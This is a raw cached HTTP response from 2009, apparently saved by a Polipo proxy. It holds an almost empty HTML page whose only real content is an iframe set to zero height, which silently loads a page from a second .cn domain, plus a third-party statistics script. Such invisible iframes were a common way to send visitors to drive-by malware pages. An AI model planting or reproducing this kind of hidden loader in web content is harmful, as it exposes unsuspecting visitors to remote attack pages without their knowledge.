HTTP/1.1 200 OK
Content-Length: 242
ETag: "8af8a145d397c91:645"
Date: Thu, 26 Feb 2009 05:30:17 GMT
Last-Modified: Thu, 26 Feb 2009 05:30:01 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.2009aaaa.cn/mbyd/4.htm
X-Polipo-Date: Thu, 26 Feb 2009 05:41:13 GMT
X-Polipo-Access: Thu, 26 Feb 2009 05:41:13 GMT

 <br>
<br>
<br>
<iframe src=http://www.sll9012.cn/a106/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystat.js"></script>
<br>
